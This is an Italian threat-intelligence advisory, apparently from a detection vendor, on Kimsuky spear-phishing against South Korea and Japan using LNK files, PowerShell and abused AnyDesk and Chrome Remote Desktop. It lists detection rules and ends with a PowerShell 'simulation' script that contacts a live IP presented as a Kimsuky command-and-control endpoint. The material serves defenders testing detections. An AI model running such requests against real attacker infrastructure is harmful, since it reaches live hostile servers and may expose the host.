SOC Prime Bias: Critical

26 Aug 2026 06:32 UTC

Kimsuky Utilizza Strumenti RMM Legittimi nelle Campagne in Asia Nordorientale

Author Photo
SOC Prime Team linkedin icon Segui
Kimsuky Utilizza Strumenti RMM Legittimi nelle Campagne in Asia Nordorientale
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

Gli attori della minaccia Kimsuky stanno conducendo campagne di spear-phishing contro obiettivi in Corea del Sud e Giappone utilizzando file LNK ospitati su OneDrive. Una volta eseguito, il malware stabilisce la persistenza attraverso attività pianificate e recupera script PowerShell per rubare informazioni di sistema, email e battute di tastiera. Gli attaccanti abusano anche di strumenti di controllo remoto legittimi come Chrome Remote Desktop e AnyDesk per mantenere l’accesso mascherandosi con l’attività amministrativa normale.

Indagine

L’indagine ha rivelato una catena di infezione a più fasi che coinvolge file LNK dannosi, VBScript offuscato e script PowerShell. I ricercatori hanno analizzato componenti specializzati tra cui un’estensione dannosa per Chrome progettata per raccogliere dati di Gmail e script utilizzati per installare AnyDesk. Commenti e stringhe di debug in coreano trovati nel codice generato dall’IA suggeriscono anche che gli operatori potrebbero utilizzare l’IA generativa durante lo sviluppo.

Mitigazione

Gli utenti dovrebbero esercitare cautela quando aprono file LNK o link ricevuti da fonti sconosciute, specialmente perché Windows può nascondere le estensioni dei file. Le organizzazioni dovrebbero regolarmente verificare il software installato per evitare distribuzioni non autorizzate di Chrome Remote Desktop o AnyDesk. Si raccomanda inoltre di monitorare le estensioni del browser per permessi eccessivi o inattesi.

Risposta

Se viene rilevata un’attività Kimsuky, i team di sicurezza dovrebbero rivedere le attività pianificate per voci sospette che lanciano wscript.exe or powershell.exe. Processi AnyDesk inattesi e file situati in %appdata% le directory dovrebbero anche essere indagate. Le estensioni del browser e le configurazioni di desktop remoto dovrebbero essere riviste per identificare e rimuovere i meccanismi di accesso non autorizzati.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

File LNK Potenzialmente Malevolo con Doppia Estensione (via cmdline)

Team SOC Prime
25 Ago 2026

LOLBAS WScript / CScript (via process_creation)

Team SOC Prime
25 Ago 2026

LOLBAS Schtasks (via cmdline)

Team SOC Prime
25 Ago 2026

Esecuzione Sospetta dal Profilo Utente Pubblico (via process_creation)

Team SOC Prime
25 Ago 2026

Uso Sospetto di CURL (via cmdline)

Team SOC Prime
25 Ago 2026

Stringhe PowerShell Sospette (via powershell)

Team SOC Prime
25 Ago 2026

Chiamata di Metodi .NET Sospetti da PowerShell (via powershell)

Team SOC Prime
25 Ago 2026

File Sospetti nel Profilo Utente Pubblico (via file_event)

Team SOC Prime
25 Ago 2026

IOC (HashMd5) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico Parte 2

Regole AI SOC Prime
25 Ago 2026

IOC (HashMd5) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico Parte 1

Regole AI SOC Prime
25 Ago 2026

IOC (SourceIP) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico

Regole AI SOC Prime
25 Ago 2026

IOC (DestinationIP) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico

Regole AI SOC Prime
25 Ago 2026

Rilevamento di Indicatori di Comunicazione C&C di Kimsuky [Connessione di Rete Windows]

Regole AI SOC Prime
25 Ago 2026

Attività Pianificata per l’Esecuzione di VBScript Danni [Windows Powershell]

Regole AI SOC Prime
25 Ago 2026

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-volo del Telemetria & Baseline deve essere superato.

Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa dell’Attacco & Comandi: L’avversario ha ottenuto inizialmente un punto d’appoggio sulla workstation Windows tramite un allegato di spear-phishing. Per stabilire il Comando e Controllo (C2) e iniziare l’esfiltrazione delle informazioni di sistema, l’attaccante esegue una one-liner di PowerShell. Questo script è progettato per imitare il comportamento noto del gruppo Kimsuky: contattare un endpoint PHP specifico su un server compromesso per ricevere ulteriori istruzioni. L’obiettivo è confondersi con il traffico web standard colpendo l’esatto endpoint C2 identificato dall’intelligence sulle minacce.

  • Script di Test di Regressione:

    # Script di Simulazione C2 di Kimsuky
    # Questo script simula una richiesta a uno degli URL hardcoded nella regola di rilevamento.
    
    $c2_url = "http://103.77.242.187/view.php?type=apple&seed=simulation_test"
    $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    
    Write-Host "[!] Simulazione di Comunicazione C2 di Kimsuky con: $c2_url"
    
    try {
        # Usando Invoke-WebRequest per generare traffico HTTP a livello proxy
        $response = Invoke-WebRequest -Uri $c2_url -UserAgent $user_agent -Method Get -ErrorAction Stop
        Write-Host "[+] Richiesta completata. Codice Stato: $($response.StatusCode)"
    } catch {
        Write-Host "[-] Richiesta fallita (previsto se l'IP non è attivo): $($_.Exception.Message)"
    }
  • Comandi di Pulizia:

    # Non sono stati creati file persistenti; nessuna pulizia richiesta.
    # Se un file è stato scaricato, usa: Remove-Item -Path "C:pathtomalicious_file.exe" -Force
    Write-Host "[*] Pulizia simulazione completata."